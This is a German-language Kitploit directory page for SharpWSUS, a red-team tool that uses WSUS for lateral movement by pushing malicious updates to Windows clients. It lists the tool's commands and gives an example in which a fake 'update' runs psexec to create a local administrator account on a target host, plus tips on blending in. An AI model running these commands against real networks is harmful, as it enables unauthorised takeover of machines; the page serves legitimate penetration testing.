Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SharpWSUS — C#-Tool für laterale Bewegung durch WSUS, indem bösartige Updates erstellt, genehmigt und auf Ziel-Windows-Clients in Active Directory-Umgebungen bereitgestellt werden. | Kitploit
Tools/GitHubGitHub/nettitude/sharpwsus
Laterale BewegungPenetrationstestsRed Teaming
GitHubnettitude/sharpwsus

SharpWSUS

C#-Tool für laterale Bewegung durch WSUS, indem bösartige Updates erstellt, genehmigt und auf Ziel-Windows-Clients in Active Directory-Umgebungen bereitgestellt werden.

Repository anzeigen
50380vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SharpWSUS

SharpWSUS ist ein CSharp-Tool für laterale Bewegung durch WSUS. Es gibt einen zugehörigen Blog (https://labs.nettitude.com/blog/introducing-sharpwsus/), der detailliertere Informationen über das Tool, den Anwendungsfall und die Erkennung enthält.

Danksagungen

Großer Dank an die folgenden Ressourcen, die wirklich 90% davon für mich erledigt haben. Dieses Tool ist nur eine Verbesserung der untenstehenden für C2-Zuverlässigkeit und Flexibilität.

  • https://github.com/AlsidOfficial/WSUSpendu - Powershell-Tool zum Missbrauch von WSUS
  • https://github.com/ThunderGunExpress/Thunder_Woosus - Csharp-Tool zum Missbrauch von WSUS

Hilfemenü

root@kitploit:~
 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team


Die unten aufgeführten Befehle haben optionale Parameter in <>.

WSUS-Server lokalisieren:
    SharpWSUS.exe locate

WSUS-Server inspizieren, Clients, Server und vorhandene Gruppen auflisten:
    SharpWSUS.exe inspect

Ein Update erstellen (HINWEIS: Die Payload muss eine Windows-signierte Binärdatei sein):
    SharpWSUS.exe create /payload:[Dateipfad] /args:[Argumente für Payload] </title:[Update-Titel] /date:[JJJJ-MM-TT] /kb:[KB auf Update] /rating:[Bewertung des Updates] /msrc:[MSRC] /description:[Beschreibung] /url:[URL]>

Ein Update genehmigen:
    SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Zielcomputer] </groupname:[Gruppe, der der Computer hinzugefügt werden soll] /approver:[Name des Genehmigers]>

Status eines Updates prüfen:
    SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Ziel-FQDN]

Update löschen und hinzugefügte Gruppen bereinigen:
    SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Ziel-FQDN] </groupname:[Gruppenname] /keepgroup>

Beispielnutzung

root@kitploit:~
sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user phil Password123! /add && net localgroup administrators phil /add\\"" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

Hinweise

  • Die Binärdatei muss Windows-signiert sein, daher sind psexec, msiexec, msbuild usw. für laterale Bewegung nützlich.
  • Die Metadaten beim create-Befehl sind nicht erforderlich, aber nützlich, um sich in die Umgebung einzufügen.
  • Beim Testen in einem Labor dauert der erste in der Regel kurz, dann dauert jedes weitere Update ein paar Stunden (das liegt daran, wie Windows bewertet, ob ein Update bereits installiert ist oder nicht).
Tool herunterladen